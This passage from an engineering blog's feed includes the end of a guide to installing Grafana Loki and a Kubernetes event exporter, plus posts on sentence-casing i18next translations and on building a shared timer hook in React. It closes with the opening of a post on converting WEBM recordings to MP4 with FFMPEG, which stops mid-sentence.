Install the grafana/loki stack using the Helm chart</h3><p>Create a <strong>loki-values.yaml</strong> file with the below snippet.</p><pre><code>loki:
  readinessProbe: {}
  auth_enabled: false
  storage:
    bucketNames:
      chunks: grafana-loki-chunks-bucket
      ruler: grafana-loki-ruler-bucket
      admin: grafana-loki-admin-bucket
    type: s3
    s3:
      endpoint: null
      region: us-east-1
      secretAccessKey: null
      accessKeyId: null
      s3ForcePathStyle: false
      insecure: false
monitoring:
  lokiCanary:
    enabled: false
  selfMonitoring:
    enabled: false
test:
  enabled: false
serviceAccount:
  create: true
  name: grafana-loki-access-s3-role-sa
  imagePullSecrets: []
  annotations:
    eks.amazonaws.com/role-arn: arn:aws:iam::account_id:role/loki-role
  automountServiceAccountToken: true
</code></pre><p>To install Loki using the Helm chart on the Kubernetes Cluster, run this <code>helm install</code> command:</p><pre><code class="language-bash">helm install my-loki grafana/loki --values loki-values.yaml</code></pre><p>Output:</p><p><img src="/blog_images/2024/k8s-event-exporter-and-grafana-loki-integration/chart-installation-output.png" alt="chart-installation-output.png"></p><p>We have successfully installed Loki on the Kubernetes Cluster.</p><p>Run the following command to view all the resources created by the Loki Helm chart in your Kubernetes cluster:</p><pre><code class="language-bash">kubectl get all -l app.kubernetes.io/name=loki</code></pre><p>Output:</p><p><img src="/blog_images/2024/k8s-event-exporter-and-grafana-loki-integration/all-resources-output.png" alt="all-resources-output.png"></p><p>The Helm chart created the following components:</p><ul><li><strong>Loki read and write:</strong> Loki is installed in scalable mode by default, which includes a read component and a write component. 
These components can be independently scaled out.</li><li><strong>Gateway:</strong> Inspired by Grafana's <a href="https://github.com/grafana/loki/blob/main/production/ksonnet/loki">Tanka setup</a>, the chart installs a gateway component by default. This NGINX component exposes Loki's API and automatically proxies requests to the appropriate Loki components (read or write, or a single instance in the case of filesystem storage). The gateway must be enabled to provide an Ingress, since the Ingress only exposes the gateway. If enabled, Grafana and log shipping agents, such as Promtail, should be configured to use the gateway. If NetworkPolicies are enabled, they become more restrictive when the gateway is active.</li><li><strong>Caching:</strong> In-memory caching is enabled by default. If this type of caching is unsuitable for your deployment, consider setting up memcached.</li></ul><p>Run this command to view all the Kubernetes Services for Loki:</p><pre><code class="language-bash">kubectl get service -l app.kubernetes.io/name=loki</code></pre><p>Output:</p><p><img src="/blog_images/2024/k8s-event-exporter-and-grafana-loki-integration/all-services-output.png" alt="all-services-output.png"></p><p>Listed services for Loki are:</p><ul><li>loki-backend</li><li>loki-backend-headless</li><li>loki-gateway</li><li>loki-memberlist</li><li>loki-read</li><li>loki-read-headless</li><li>loki-write</li><li>loki-write-headless</li><li>query-scheduler-discovery</li></ul><p>The <code>loki-gateway</code> service will be used to add Loki as a data source in Grafana.</p><h3>6. Adding Loki data source in Grafana</h3><p>On the main page of Grafana, click on &quot;<strong>Home</strong>&quot;. 
Under &quot;<strong>Connections</strong>&quot;, you will find the &quot;<strong>Data sources</strong>&quot; option.</p><p><img src="/blog_images/2024/k8s-event-exporter-and-grafana-loki-integration/grafana-dashboard.png" alt="/blog_images/event-exporter-and-grafana-loki-integration/grafana-dashboard.png"></p><p>On the Data Sources page, click on the &quot;Add new data source&quot; button.</p><p><img src="/blog_images/2024/k8s-event-exporter-and-grafana-loki-integration/data-sources-page.png" alt="/blog_images/event-exporter-and-grafana-loki-integration/data-sources-page.png"></p><p>In the search bar, type &quot;Loki&quot; and search for it.</p><p><img src="/blog_images/2024/k8s-event-exporter-and-grafana-loki-integration/add-data-source.png" alt="/blog_images/event-exporter-and-grafana-loki-integration/add-data-source.png"></p><p>Clicking on &quot;Loki&quot; will redirect you to the dedicated page for the Loki data source.</p><p><img src="/blog_images/2024/k8s-event-exporter-and-grafana-loki-integration/loki-data-source.png" alt="/blog_images/event-exporter-and-grafana-loki-integration/loki-data-source.png"></p><p>To read the data from Loki, we will use the <code>loki-gateway</code> service. Add the URL of the service as <code>http://loki-gateway</code>.</p><p><img src="/blog_images/2024/k8s-event-exporter-and-grafana-loki-integration/loki-form.png" alt="/blog_images/event-exporter-and-grafana-loki-integration/loki-form.png"></p><p>After clicking on the &quot;Save &amp; test&quot; button, you will receive the toastr message shown in the image below. This message is received because no clients have been created for Loki yet.</p><p><img src="/blog_images/2024/k8s-event-exporter-and-grafana-loki-integration/loki-addon-output.png" alt="loki-addon-output.png"></p><h3>7. 
Install Kubernetes event exporter using the Helm chart</h3><p>Create an <strong>event-exporter-values.yaml</strong> file with the below snippet.</p><pre><code class="language-yaml">config:
  leaderElection: {}
  logLevel: debug
  logFormat: pretty
  metricsNamePrefix: event_exporter_
  receivers:
    - name: &quot;dump&quot;
      file:
        path: &quot;/dev/stdout&quot;
        layout: {}
    - name: &quot;loki&quot;
      loki:
        url: &quot;http://loki-gateway/loki/api/v1/push&quot;
        streamLabels:
          source: kubernetes-event-exporter
          container: kubernetes-event-exporter
  route:
    routes:
      - match:
          - receiver: &quot;dump&quot;
          - receiver: &quot;loki&quot;
</code></pre><p>Using the above snippet, run these commands to install the Kubernetes event exporter in your Kubernetes Cluster.</p><pre><code class="language-bash">helm repo add bitnami https://charts.bitnami.com/bitnami
helm install event-exporter bitnami/kubernetes-event-exporter --values event-exporter-values.yaml
</code></pre><p>Output:</p><p><img src="/blog_images/2024/k8s-event-exporter-and-grafana-loki-integration/event-exporter-installation-output.png" alt="event-exporter-installation-output.png"></p><p>To view all the resources created by the above Helm chart, run this command:</p><pre><code class="language-bash">kubectl get all -l app.kubernetes.io/name=kubernetes-event-exporter</code></pre><p>Output:</p><p><img src="/blog_images/2024/k8s-event-exporter-and-grafana-loki-integration/event-exporter-all-resources.png" alt="event-exporter-all-resources.png"></p><p>To view the logs of the event exporter pod, run this command:</p><pre><code class="language-bash">kubectl logs -f pod/kubernetes-event-exporter-586455bbdd-sqlqc</code></pre><p>Note: Replace <strong>kubernetes-event-exporter-586455bbdd-sqlqc</strong> with your pod name.</p><p>Output:</p><p><img 
src="/blog_images/2024/k8s-event-exporter-and-grafana-loki-integration/event-exporter-logs.png" alt="event-exporter-logs"></p><p>As you can see in the above image, the event exporter is working and running fine. Event logs are being sent to both the receivers that we configured in the values YAML file.</p><p>Once the pod is created and running, we can go back to the Loki data source under the <strong>Connections</strong> &gt; <strong>Data Sources</strong> page.</p><p>Again click on the &quot;Save &amp; test&quot; button, and this time you'll receive a success toastr message.</p><p>Output:</p><p><img src="/blog_images/2024/k8s-event-exporter-and-grafana-loki-integration/loki-data-source-added-output.png" alt="loki-data-source-added-output"></p><h3>8. Kubernetes event exporter dashboard</h3><p>We will import this <a href="https://grafana.com/grafana/dashboards/17882-kubernetes-event-exporter/">dashboard</a> into Grafana to monitor and track the events received from the Kubernetes cluster. You can go through this blog if you want to learn how to import an existing dashboard into Grafana.</p><p>After successfully importing the dashboard, you can view all the events from the cluster, as shown in the image below. Additionally, you can filter the events based on any value within any interval.</p><p>Kubernetes Event Exporter</p><p><img src="/blog_images/2024/k8s-event-exporter-and-grafana-loki-integration/event-exporter-dashboard.png" alt="Kubernetes Event Exporter"></p><h2>Conclusion</h2><p>In this blog post, we discussed the process of setting up Grafana Loki and Kubernetes Event exporter. 
We covered various steps, such as creating a policy for Grafana Loki, creating a role with the necessary permissions, installing Grafana using the Helm chart, installing the Loki stack, adding Loki as a data source in Grafana, installing the Kubernetes event exporter using the Helm chart, and finally, setting up the Kubernetes event exporter dashboard in Grafana.</p><p>By following the steps outlined in this blog post, you can effectively monitor and track events from your Kubernetes cluster using Grafana Loki and the Kubernetes event exporter. This setup provides valuable insights and helps in troubleshooting and analyzing events in your cluster.</p><p>If you have any questions or feedback, please feel free to reach out. Happy monitoring!</p>]]></content>
    </entry><entry>
       <title><![CDATA[Automatically sentence-case i18next translations]]></title>
       <author><name>Farhan CK</name></author>
      <link href="https://www.bigbinary.com/blog/lowercase-translations"/>
      <updated>2024-04-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/lowercase-translations</id>
<content type="html"><![CDATA[<p>We use <a href="https://www.i18next.com/">i18next</a> to handle our localization requirements. We have written in great detail how we use <a href="https://www.bigbinary.com/blog/react-localization">i18next and react-i18next libraries</a> in our applications.</p><p>As our translations grew, we realized that instead of adding every combination of the texts as separate entries in the translation file, we can reuse most of them by utilizing the i18next interpolation feature.</p><p><a href="https://www.i18next.com/translation-function/interpolation">Interpolation</a> is one of the most used functionalities in i18n. It allows integrating dynamic values into our translations.</p><pre><code class="language-json">{
  &quot;key&quot;: &quot;{{what}} is {{how}}&quot;
}</code></pre><pre><code class="language-js">i18next.t(&quot;key&quot;, { what: &quot;i18next&quot;, how: &quot;great&quot; });
// -&gt; &quot;i18next is great&quot;</code></pre><h3>Problem</h3><p>As we started to use interpolation more and more, we started seeing a lot of text with irregular casing. For instance, in one of our apps, we have an <code>Add</code> button in a few pages.</p><pre><code class="language-json">{
  &quot;addMember&quot;: &quot;Add a member&quot;,
  &quot;addWebsite&quot;: &quot;Add a website&quot;
}</code></pre><p>Instead of adding each text as an entry in the translation file as shown above, we took a bit of a generic approach and started using interpolation. Now our translation files started to look like this.</p><pre><code class="language-json">{
  &quot;add&quot;: &quot;Add a {{entity}}&quot;,
  &quot;entities&quot;: {
    &quot;member&quot;: &quot;Member&quot;,
    &quot;website&quot;: &quot;Website&quot;
  }
}</code></pre><p>This is great, but it has a slight problem. 
The final text looked like this.</p><pre><code class="language-plaintext">Add a Member</code></pre><p>We can see that <code>Member</code> is still capitalized; we needed it to be properly sentence-cased like this.</p><pre><code class="language-plaintext">Add a member</code></pre><p>We first thought we would just add <code>.toLocaleLowerCase()</code> to the dynamic value.</p><pre><code class="language-js">t(&quot;add&quot;, { entity: t(&quot;entities.member&quot;).toLocaleLowerCase() });</code></pre><p>It worked fine. But often, developers would forget to add <code>.toLocaleLowerCase()</code> in a lot of places. Secondly, it started to pollute our code with too much <code>.toLocaleLowerCase()</code>.</p><p>As always, we decided to extract this problem to our <a href="https://www.bigbinary.com/blog/neeto-commons-frontend">neeto-commons-frontend</a> package.</p><h3>Solutions we looked at</h3><p>At first, it seemed like a very simple problem. We thought we could just use the <a href="https://www.i18next.com/misc/creating-own-plugins#post-processor">post-processor</a> feature. We just need to sentence-case the entire text on <code>post-process</code> like this.</p><pre><code class="language-js">const sentenceCaseProcessor = {
  type: &quot;postProcessor&quot;,
  name: &quot;sentenceCaseProcessor&quot;,
  process: text =&gt; {
    // Sentence-case text.
    return (
      text.charAt(0).toLocaleUpperCase() + text.slice(1).toLocaleLowerCase()
    );
  },
};

i18next
  .use(LanguageDetector)
  .use(initReactI18next)
  .use(sentenceCaseProcessor)
  .init({
    resources: resources,
    fallbackLng: &quot;en&quot;,
    interpolation: {
      escapeValue: false,
      skipOnVariables: false,
    },
    postProcess: [sentenceCaseProcessor.name],
  });</code></pre><p>Voila! From now on, all the texts will be properly sentence-cased; we no longer need to add <code>.toLocaleLowerCase()</code>. Great? 
Not really.</p><p>We soon realized that not every text should be sentence-cased; there are a lot of cases where we need to preserve the original casing. Here are some examples.</p><pre><code class="language-plaintext">Your file is larger than 2MB.
Disconnect Google integration?
No results found with your search query &quot;Oliver&quot;.
Your Api Key: AJg3c4TcXXXXXXXXX
No internet, NeetoForm is offline.</code></pre><p>These examples clearly show why it's not a simple problem. We require a more targeted and nuanced solution. Upon revisiting the issue, we found that our initial solution of adding <code>.toLocaleLowerCase()</code> does work, but it's a bit verbose.</p><p>So we decided to try <a href="https://www.i18next.com/translation-function/formatting#adding-custom-format-function">custom formatters</a>. Instead of adding <code>.toLocaleLowerCase()</code>, we created a nice custom formatter called <code>lowercase</code>.</p><pre><code class="language-js">i18next.services.formatter.add(&quot;lowercase&quot;, (value, lng, options) =&gt; {
  return value.toLocaleLowerCase();
});</code></pre><pre><code class="language-json">{
  &quot;add&quot;: &quot;Add a {{entity, lowercase}}&quot;,
  &quot;entities&quot;: {
    &quot;member&quot;: &quot;Member&quot;,
    &quot;website&quot;: &quot;Website&quot;
  }
}</code></pre><p>This works perfectly, but it doesn't solve the verbosity problem. Instead of adding <code>.toLocaleLowerCase()</code> in JavaScript files, we're now adding it in translation JSON files, essentially just moving the problem to a different place.</p><p>We needed a better solution that required minimal effort.</p><p>The idea here is to lowercase all dynamic values by default and create a formatter to handle exceptions. To achieve this, we combined our previous post-processor and a new formatter. The new formatter, which we called <code>anyCase</code>, can be used to flag any dynamic part in the text that needs to be excluded from lowercasing. 
The post-processor will ignore these particular parts of the text while sentence-casing.</p><pre><code class="language-js">const ANY_CASE_STR = &quot;__ANY_CASE__&quot;;

i18next.services.formatter.add(&quot;anyCase&quot;, (value, lng, options) =&gt; {
  return ANY_CASE_STR + value + ANY_CASE_STR;
});</code></pre><pre><code class="language-json">{
  &quot;message&quot;: &quot;Your file is larger than {{size, anyCase}}&quot;
}</code></pre><p>The post-processor we wrote attempted to identify the parts of the text marked by the <code>anyCase</code> formatter using pattern matching and to retain their original casing. However, this approach failed when the text contained identical words in both the dynamic and static parts of the text. It ended up lowercasing both words, which is not the output we needed.</p><h3>Final solution</h3><p>Before we discuss the final solution, note that i18next recently changed how a formatter is added. This new style is what we have been using so far, like below.</p><pre><code class="language-js">i18next.services.formatter.add(&quot;underscore&quot;, (value, lng, options) =&gt; {
  return value.replace(/\s+/g, &quot;_&quot;);
});</code></pre><p>Before this, i18next had a different syntax, which they now call legacy formatting. It looks like below.</p><pre><code class="language-js">i18next.use(initReactI18next).init({
  resources: resources,
  fallbackLng: &quot;en&quot;,
  interpolation: {
    format: (value, format, lng, options) =&gt; {
      // All our formatters should go here.
    },
  },
});</code></pre><p>Now back to our original problem.</p><p>We need to make sure that when applying formatting, it only formats dynamic parts. For this, we found that if we use the legacy version of formatting, it offers an option called <code>alwaysFormat: true</code>. One thing to remember here is that if we choose to use this flag, the latest style of formatting does not work. 
That means we need to move all our custom formatters to the legacy format function.</p><pre><code class="language-js">i18next.use(initReactI18next).init({
  resources: resources,
  fallbackLng: &quot;en&quot;,
  interpolation: {
    escapeValue: false,
    skipOnVariables: false,
    alwaysFormat: true,
    format: (value, format, lng, options) =&gt; {
      // All your formatters should go here.
    },
  },
});</code></pre><p>This is not a problem for us, because we are already maintaining all our custom formatters in one place (the <code>neeto-commons-frontend</code> package). Now the formatter is applied to every dynamic text. This approach also overcame the &quot;identical words in the text&quot; problem that we encountered with the previous version of the formatter. Let's look at our updated formatter.</p><pre><code class="language-js">const LOWERCASED = &quot;__LOWERCASED__&quot;;

const lowerCaseFormatter = (value, format) =&gt; {
  if (!value || format === ANY_CASE || typeof value !== &quot;string&quot;) {
    return value;
  }

  return LOWERCASED + value.toLocaleLowerCase();
};</code></pre><p>To elaborate on the code, the formatter lowercases all dynamic texts and prefixes them with <code>__LOWERCASED__</code>. This prefixing is necessary because the formatter lacks information about where this specific piece of text originally appeared in the complete text. By adding this prefix, if the lowercased text happens to be the first part of the output, we can revert it during the post-processing stage. And that's precisely what we accomplished in the post-processor.</p><pre><code class="language-js">const sentenceCaseProcessor = {
  type: &quot;postProcessor&quot;,
  name: &quot;sentenceCaseProcessor&quot;,
  process: value =&gt; {
    const shouldSentenceCase = value.startsWith(LOWERCASED); // Check if first word is lowercased.
    value = value.replaceAll(LOWERCASED, &quot;&quot;); // Remove all __LOWERCASED__

    return shouldSentenceCase ?
sentenceCase(value) : value;
  },
};</code></pre><p>Below is everything put together. If you're interested in a working example of the same, check out this <a href="https://gist.github.com/neerajsingh0101/3c1413c28ec9115091b6644e3ceb9764">gist</a>.</p><pre><code class="language-js">const LOWERCASED = &quot;__LOWERCASED__&quot;;
const ANY_CASE = &quot;anyCase&quot;;

const sentenceCase = value =&gt;
  value.charAt(0).toLocaleUpperCase() + value.slice(1);

const lowerCaseFormatter = (value, format) =&gt; {
  if (!value || format === ANY_CASE || typeof value !== &quot;string&quot;) {
    return value;
  }

  return LOWERCASED + value.toLocaleLowerCase();
};

const sentenceCaseProcessor = {
  type: &quot;postProcessor&quot;,
  name: &quot;sentenceCaseProcessor&quot;,
  process: value =&gt; {
    const shouldSentenceCase = value.startsWith(LOWERCASED);
    value = value.replaceAll(LOWERCASED, &quot;&quot;);

    return shouldSentenceCase ? sentenceCase(value) : value;
  },
};

i18next
  .use(LanguageDetector)
  .use(initReactI18next)
  .use(sentenceCaseProcessor)
  .init({
    resources: resources,
    fallbackLng: &quot;en&quot;,
    interpolation: {
      escapeValue: false,
      skipOnVariables: false,
      alwaysFormat: true,
      format: (value, format, lng, options) =&gt; {
        // other formatters
        return lowerCaseFormatter(value, format);
      },
    },
    postProcess: [sentenceCaseProcessor.name],
    detection: {
      order: [&quot;querystring&quot;, &quot;cookie&quot;, &quot;navigator&quot;, &quot;path&quot;],
      caches: [&quot;cookie&quot;],
      lookupQuerystring: &quot;lang&quot;,
      lookupCookie: &quot;lang&quot;,
    },
  });</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Implementation of a universal timer]]></title>
       <author><name>Labeeb Latheef</name></author>
      <link href="https://www.bigbinary.com/blog/universal-timer"/>
      <updated>2024-03-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/universal-timer</id>
<content type="html"><![CDATA[<p>When developing a web application, there could be numerous instances where we deal with timers. The timer functions such as <code>setTimeout</code> and <code>setInterval</code> are basic browser APIs that all web developers are well acquainted with. When trying to implement something like a self-advancing timer, these timer APIs make the job easy.</p><p>Let's consider a simple use case. In React, if we are asked to implement a countdown timer that updates the time on the screen every second, we can use the <code>setInterval</code> method to get the job done.</p><pre><code class="language-jsx">const CountDownTimer = () =&gt; {
  const [time, setTime] = useState(10);

  useEffect(() =&gt; {
    const interval = setInterval(() =&gt; {
      setTime(time =&gt; {
        if (time &gt; 0) return time - 1;

        clearInterval(interval);

        return time;
      });
    }, 1000); // Run this every 1 second.

    return () =&gt; clearInterval(interval); // Clean up on unmount.
  }, []);

  return &lt;p&gt;Remaining time: {time}&lt;/p&gt;;
};</code></pre><p>This works great if we are only expecting to show a single timer on the page. What if we have to show multiple timers running on the same page?</p><h4>Multiple timers</h4><p>In the conversation page of our <a href="https://neetochat.com">NeetoChat</a> application, when listing each message in a conversation, we annotate each message with a &quot;time-ago&quot; label. This label indicates the duration since the message was received and is expected to self-advance with passing time.</p><p><img src="/blog_images/2024/universal-timer/neeto-chat-timestamp-2.png" alt="NeetoChat timestamp"><img src="/blog_images/2024/universal-timer/neeto-chat-timestamp-1.png" alt="NeetoChat timestamp"></p><p>Normally, our first take on such an implementation would be to use a <code>setInterval</code> timer inside the message component, which triggers the component to re-render every second to update the label. 
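</p><p>That naive take might look roughly like this (a hypothetical plain-JavaScript sketch; <code>startTimeAgoLabel</code> and <code>formatTimeAgo</code> are illustrative names, not NeetoChat code, and <code>render</code> stands in for a state setter):</p><pre><code class="language-javascript">// Hypothetical helper: turn a timestamp into a coarse "time-ago" label.
function formatTimeAgo(timestamp) {
  const seconds = Math.floor((Date.now() - timestamp) / 1000);
  return seconds + 's ago';
}

// Naive approach: every mounted label schedules its own interval.
function startTimeAgoLabel(timestamp, render) {
  const id = setInterval(function () {
    render(formatTimeAgo(timestamp));
  }, 1000);

  // The caller must remember to stop this interval on unmount.
  return function stop() {
    clearInterval(id);
  };
}</code></pre><p>With hundreds of messages mounted at once, this schedules hundreds of independent intervals. 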
This becomes highly inefficient when we have hundreds of messages to be rendered on the screen at the same time.</p><p>The browser ends up running separate timers for each message to update their labels. Also, due to their asynchronous behavior, there is a higher chance that these timer events get stuck in the JS event loop and get fired at inappropriate moments or get dropped altogether.</p><h4>Using a single timer</h4><p>An alternate approach could be to keep a single timer and a state on the message listing parent component, then update the state on every passing second and trigger a re-render of the entire list. The obvious downside of this approach is re-rendering a large conversation list and its children every single second. This is highly inefficient and leads to unexpected stutter and other performance issues.</p><p>What we wanted to achieve was to use a single timer that updates a single state, triggering the re-render of all the components that need to be updated. In the case of NeetoChat conversations, we needed to update the &quot;time-ago&quot; labels alone, not the entire message component or any of its parents.</p><p>React's <a href="https://legacy.reactjs.org/docs/context.html">Context API</a> was the most appropriate choice at the time for this task. The Context API offers a simple way of sharing states or values across different components. Whenever the value or the state changes, all its subscribed components are immediately notified of the change and trigger a re-render. To use this approach, first, we extracted the timer and the state into a Context. Then, all the components that need to be updated over time are subscribed to this context value. 
The timer updates the context value, and the subscribed components get rerendered.</p><pre><code class="language-jsx">import React, {
  createContext,
  useEffect,
  useRef,
  useMemo,
  useCallback,
} from &quot;react&quot;;

const IntervalContext = createContext({});

const defaultClockDelay = 10 * 1000; // 10 seconds

export const IntervalProvider = ({ children }) =&gt; {
  const subscriptions = useRef(new Map()).current;

  useEffect(() =&gt; {
    const interval = setInterval(() =&gt; {
      const now = Date.now();
      for (const subscription of subscriptions.values()) {
        // Skip this subscription if its delay has not elapsed yet.
        if (now &lt; subscription.time) continue;

        subscription.callback(now);
        // Set next callback time for the subscription.
        subscription.time = now + subscription.delay;
      }
    }, defaultClockDelay);

    return () =&gt; {
      clearInterval(interval);
    };
  }, [subscriptions]);

  const subscribe = useCallback(
    (callback, delay = defaultClockDelay) =&gt; {
      if (typeof callback !== &quot;function&quot;) return undefined;

      const subscription = { callback, delay, time: Date.now() + delay };
      subscriptions.set(subscription, subscription);

      // Unsubscribe callback.
      return () =&gt; subscriptions.delete(subscription);
    },
    [subscriptions]
  );

  const contextValue = useMemo(() =&gt; ({ subscribe }), [subscribe]);

  return (
    &lt;IntervalContext.Provider value={contextValue}&gt;
      {children}
    &lt;/IntervalContext.Provider&gt;
  );
};

export default IntervalContext;</code></pre><p>The above context exposes a <code>subscribe</code> method that accepts a callback and a delay, which is added to the list of subscriptions. 
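</p><p>Stripped of React, the provider's bookkeeping can be sketched as a plain subscription registry (a hypothetical, framework-free sketch; <code>tick</code> stands in for the body of the shared <code>setInterval</code> callback):</p><pre><code class="language-javascript">// Framework-free sketch of the subscription registry (hypothetical names).
const subscriptions = new Map();

function subscribe(callback, delay) {
  const subscription = { callback: callback, delay: delay, time: Date.now() + delay };
  subscriptions.set(subscription, subscription);

  // Return an unsubscribe function for cleanup.
  return function unsubscribe() {
    subscriptions.delete(subscription);
  };
}

// The single shared tick: fire only the subscriptions whose delay has elapsed.
function tick(now) {
  for (const subscription of subscriptions.values()) {
    if (subscription.time > now) continue; // Delay not elapsed yet; skip.

    subscription.callback(now);
    subscription.time = now + subscription.delay; // Schedule the next run.
  }
}</code></pre><p>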
During each interval, we iterate through the list of subscriptions and invoke those callbacks for which the specified delay has elapsed.</p><p>To integrate this universal timer into the individual components easily, we have also added a hook that wraps around the common subscription and cleanup logic.</p><pre><code class="language-javascript">import { useContext, useEffect, useState } from &quot;react&quot;;

import IntervalContext from &quot;contexts/interval&quot;;

const useInterval = delay =&gt; {
  const [state, setState] = useState(Date.now());
  const { subscribe } = useContext(IntervalContext);

  useEffect(() =&gt; {
    const unsubscribe = subscribe(now =&gt; setState(now), delay);

    return unsubscribe;
  }, [delay, subscribe]);

  return state;
};

export default useInterval;</code></pre><p>Now, the component integration requires only minimal configuration.</p><pre><code class="language-jsx">import { timeFormat } from &quot;neetocommons/utils&quot;;

const TimeAgo = ({ time }) =&gt; {
  useInterval(10000); // Rerender every 10 seconds.

  // timeFormat.fromNow() returns the time
  // difference between the given time and now.
  return &lt;p&gt;{timeFormat.fromNow(time)}&lt;/p&gt;;
};</code></pre><p>This way, only the &quot;time-ago&quot; label components are updated every 10 seconds while the parent message components remain unaffected by these updates.</p><h4>Using a global store</h4><p>As soon as that work was finished, our development guidelines were updated to reflect that we should use <a href="https://github.com/pmndrs/zustand">zustand</a> for all shared state usages. 
The above universal timer implementation was refactored to use a zustand store instead of React Context.</p><pre><code class="language-javascript">import { useEffect, useMemo } from &quot;react&quot;;

import { isEmpty, omit, prop } from &quot;ramda&quot;;
import { v4 as uuid } from &quot;uuid&quot;;
import { create } from &quot;zustand&quot;;

const useTimerStore = create(() =&gt; ({}));

// Interval is created directly inside the module body,
// outside the components and hooks.
setInterval(() =&gt; {
  const currentState = useTimerStore.getState();
  const nextState = {};
  const now = Date.now();

  for (const key in currentState) {
    const { lastUpdated, interval } = currentState[key];
    // Check if delay is elapsed.
    const shouldUpdate = now - lastUpdated &gt;= interval;
    if (shouldUpdate) nextState[key] = { lastUpdated: now, interval };
  }

  if (!isEmpty(nextState)) useTimerStore.setState(nextState);
}, 1000);

// `useInterval` was changed to `useTimer`.
const useTimer = (interval = 60) =&gt; {
  const key = useMemo(uuid, []);

  useEffect(() =&gt; {
    useTimerStore.setState({
      [key]: {
        lastUpdated: Date.now(),
        interval: 1000 * interval, // Convert seconds to ms.
      },
    });

    return () =&gt;
      useTimerStore.setState(omit([key], useTimerStore.getState()), true);
  }, [interval, key]);

  return useTimerStore(prop(key));
};

export default useTimer;</code></pre><p>The zustand store allows access and updates to store values imperatively, outside the render, by calling the <code>getState()</code> and <code>setState()</code> methods.</p><h4>An improved version</h4><p>In the latest iteration of the <code>useTimer</code> hook, we decided to cut down on the external dependency <code>zustand</code> and instead migrate the implementation to use React's new <a href="https://react.dev/reference/react/useSyncExternalStore"><code>useSyncExternalStore</code></a> hook. 
The <code>useSyncExternalStore</code> hook basically allows you to derive a React state from external change events.</p><pre><code class="language-javascript">import { useRef, useSyncExternalStore } from &quot;react&quot;;

import { isNotEmpty } from &quot;neetocist&quot;;

const subscriptions = [];
let interval = null;

const initiateInterval = () =&gt; {
  // Create a new interval only if there are no existing subscriptions.
  if (isNotEmpty(subscriptions)) return;

  interval = setInterval(() =&gt; {
    subscriptions.forEach(callback =&gt; callback());
  }, 1000);
};

const cleanupInterval = () =&gt; {
  // Clean up the existing interval if there are no more subscriptions.
  if (isNotEmpty(subscriptions)) return;

  clearInterval(interval);
};

const subscribe = callback =&gt; {
  initiateInterval();
  subscriptions.push(callback);

  // Runs on unmount. Remove the subscription from the list.
  return () =&gt; {
    subscriptions.splice(subscriptions.indexOf(callback), 1);
    cleanupInterval();
  };
};

const useTimer = (delay = 60) =&gt; {
  const lastUpdatedRef = useRef(Date.now());

  return useSyncExternalStore(subscribe, () =&gt; {
    const now = Date.now();
    let lastUpdated = lastUpdatedRef.current;

    // Calculate the time difference to derive the new state.
    // If the specified delay has elapsed, return a new value for the state.
    // If not, return the last value (no state change).
    if (now - lastUpdated &gt;= delay * 1000) lastUpdated = now;

    lastUpdatedRef.current = lastUpdated;

    return lastUpdated;
  });
};</code></pre><p>In summary, when the <code>useTimer</code> hook is invoked with a delay, the callback is added to the list of subscriptions and executed when the specified delay has elapsed. On unmount, the subscription is removed from the list of subscriptions. In contrast to previous versions, the new version is much cleaner and has the added benefit of running the interval timer only when required. 
The interval is created only when the first subscription is added and cleared when all subscriptions have been removed.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Universal playback and streaming support using MP4 and Range request headers]]></title>
       <author><name>Unnikrishnan KP</name></author>
      <link href="https://www.bigbinary.com/blog/mp4_transmuxing_and_streaming_support-loom-alternative-part-3"/>
      <updated>2024-03-17T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/mp4_transmuxing_and_streaming_support-loom-alternative-part-3</id>
<content type="html"><![CDATA[<p>This is part 3 of our blog on how we are building <a href="https://www.neeto.com/neetorecord">NeetoRecord</a>, a Loom alternative. Here are <a href="https://www.bigbinary.com/blog/build-web-based-screen-recorder-loom-alternative-part-1">part 1</a> and <a href="https://www.bigbinary.com/blog/persistant-storage-for-recordings-in-s3-loom-alternative-part-2">part 2</a>.</p><p>In part 1 of our blog, we uploaded the recording from the browser to S3 in small parts and stitched them together to get the final WEBM video file. We could use this WEBM file to share our recording with our audience, but it has a few drawbacks:</p><ol><li><p>WEBM is not universally supported. Though most modern browsers support WEBM, a few browsers, especially devices in the Apple ecosystem, do not play WEBM reliably.</p></li><li><p>Metadata for timestamps and duration is not present in WEBM videos. So, these videos are not &quot;seekable.&quot; It means these videos do not show the video length, and we cannot move back and forth using the seek bar. The video starts playing back from the beginning when the user tries to drag the seek bar.</p></li></ol><p>Hence, we needed to convert the WEBM videos to a universally supported format to solve the above problems. We chose MP4.</p><h2>MP4</h2><p>MP4 is a widely used multimedia file storage format for video storage and streaming. It is an international standard that works with a vast range of devices. MP4 refers to the digital container file that acts as a wrapper around the video, not the video itself. 
The video content within MP4 files is encoded with MPEG-4, a common encoding standard.</p><p>We chose MP4 because:</p><ol><li>MP4 works with the <a href="https://developer.mozilla.org/en-US/docs/Web/HTML/Element/video">HTML5 video player</a>.</li><li>It supports multiple streaming protocols.</li><li>It has comprehensive support across user devices and browsers.</li></ol><h2>WEBM to MP4 conversion</h2><h3>AWS MediaConvert service</h3><p>Since our WEBM files were in an S3 bucket, our first idea was to use an AWS service to do the WEBM to MP4 conversion. We configured the <a href="https://aws.amazon.com/mediaconvert/">AWS Elemental MediaConvert service</a> and connected it to our WEBM bucket. When a user uploads a WEBM file to the bucket, MediaConvert picks it up, converts it to MP4, and uploads it to a new bucket.</p><p>MediaConvert worked as expected, but we had to find another solution because:</p><ol><li>Cost - we found it too expensive for our use case.</li><li>Performance - it took a long time to do the conversion. While the smaller recordings took about 20-30s, large ones took minutes. The time taken grew linearly with the size of the WEBM file.</li></ol><h3>Manual transcoding using FFMPEG on AWS Lambda</h3><p>Converting WEBM to MP4 involves transcoding. Transcoding is the process of changing the audio/video codecs in a container file. Codecs are algorithms used to encode and decode digital media data. Converting to MP4 would mean using codecs that are part of the MPEG-4 family, e.g. H.264 for video and AAC for audio. <a href="https://ffmpeg.org">FFMPEG</a> is a popular open source tool that can be used for transcoding WEBM to MP4.</p><pre><code>ffmpeg -i input.webm -c:v libx264 -c:a aac output.mp4</code></pre><ul><li><code>-c:v libx264</code> sets the video codec to libx264, a widely supported H.264 encoder.</li><li><code>-c:a aac</code> sets the audio codec to AAC, a commonly used audio codec.</li></ul><p>We could run FFMPEG on our web server and run the 